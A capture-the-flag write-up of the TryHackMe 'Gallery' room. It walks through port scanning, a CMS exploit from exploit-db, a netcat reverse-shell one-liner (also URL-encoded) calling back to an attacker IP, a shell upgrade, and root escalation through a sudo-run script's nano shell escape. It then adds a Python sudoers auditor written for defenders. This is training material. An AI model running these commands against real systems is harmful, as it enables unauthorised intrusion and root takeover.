TryHackMe: Gallery

Today we will take a look at TryHackMe: Gallery. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

Question: How many ports are open?

Command: sudo nmap -sS -sC -sV -oN nmap/initial 10.10.157.45

Question: What’s the name of the CMS?

Answer: S***** I**** G******

I searched for a suitable exploit and found it.

Let’s exploit.

Command: locate 50214.py

Command: searchsploit -m /usr/share/exploitdb/exploits/php/webapps/50214.py

Command: python 50214.py

Get Reverse Shell

Command: rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP 4242 >/tmp/f

But first, let’s URL-encode the command:

Command: rm%20-f%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.8.223.65%204242%20%3E%2Ftmp%2Ff%0A

Enter these commands after receiving the reverse shell to upgrade it to a fully interactive terminal:

Command: script /dev/null -c bash

Command: export TERM=xterm

Command: ctrl+z

Command: stty raw -echo ; fg

Command: reset

Let’s enumerate the machine with linpeas.sh.

Here we found the necessary credentials.

Let’s change the user.

Command: su mike

Privilege Escalation

Let’s look at the file rootkit.sh

Here we can use nano to get a shell. Let’s take a look at this.

Command: sudo -u root /bin/bash /opt/rootkit.sh

Command: read

Command: CTRL+R

Command: CTRL+X

Command: reset; sh 1>&0 2>&0

And now we are root.
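
A defender-side check for the misconfiguration used in this step, as an added example (not code from the room or from this writeup): it flags scripts that a sudoers rule allows and that launch an interactive program with a known shell escape, such as nano. The sudoers rule and the script body are constructed samples, and the function names are hypothetical.

```python
import os
import re

# Interactive programs with documented shell escapes (subset; extend for your estate).
ESCAPE_CAPABLE = {"nano", "vi", "vim", "less", "more", "man", "ed", "gdb"}

# Simplified sudoers rule: user host = (runas) TAG: command[, command...]
RULE = re.compile(r"^(\S+)\s+\S+\s*=\s*(?:\([^)]*\)\s*)?(?:[A-Z_]+:\s*)*(.+)$")


def escape_capable_calls(script_text):
    """Return (line_number, program) for each escape-capable program in command position."""
    hits = []
    for number, line in enumerate(script_text.splitlines(), start=1):
        if line.strip().startswith("#"):
            continue
        # Heuristic: the first word after a shell separator is treated as the command.
        for segment in re.split(r"[;|&()]+", line):
            words = segment.split()
            if words and os.path.basename(words[0]) in ESCAPE_CAPABLE:
                hits.append((number, os.path.basename(words[0])))
    return hits


def audit(sudoers_text, scripts):
    """Return (user, script_path, line_number, program) for risky sudo-permitted scripts."""
    findings = []
    for line in sudoers_text.splitlines():
        match = RULE.match(line.strip())
        if not match or line.lstrip().startswith(("#", "Defaults")):
            continue
        user, commands = match.groups()
        for command in commands.split(","):
            for word in command.split():
                for number, program in escape_capable_calls(scripts.get(word, "")):
                    findings.append((user, word, number, program))
    return findings


# Constructed sample input (not taken from the room): a sudoers rule and a script body.
SUDOERS = "mike ALL=(root) NOPASSWD: /bin/bash /opt/rootkit.sh\n"
SCRIPTS = {"/opt/rootkit.sh": """#!/bin/bash
read -e -p "list or read the report? " ans
case $ans in
    list) /bin/ls /opt ;;
    read) /bin/nano /root/report.txt ;;
esac
"""}

if __name__ == "__main__":
    for finding in audit(SUDOERS, SCRIPTS):
        print("%s may run %s as root; line %d starts %s" % finding)
```

A finding here means the rule should be replaced by one that runs a non-interactive command, or the script should print the report with a tool that has no shell escape.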

“If you have any questions or comments, please do not hesitate to write. Have a good day.”


Hello, my name is Elman. I am from Azerbaijan. I wish you a good day.
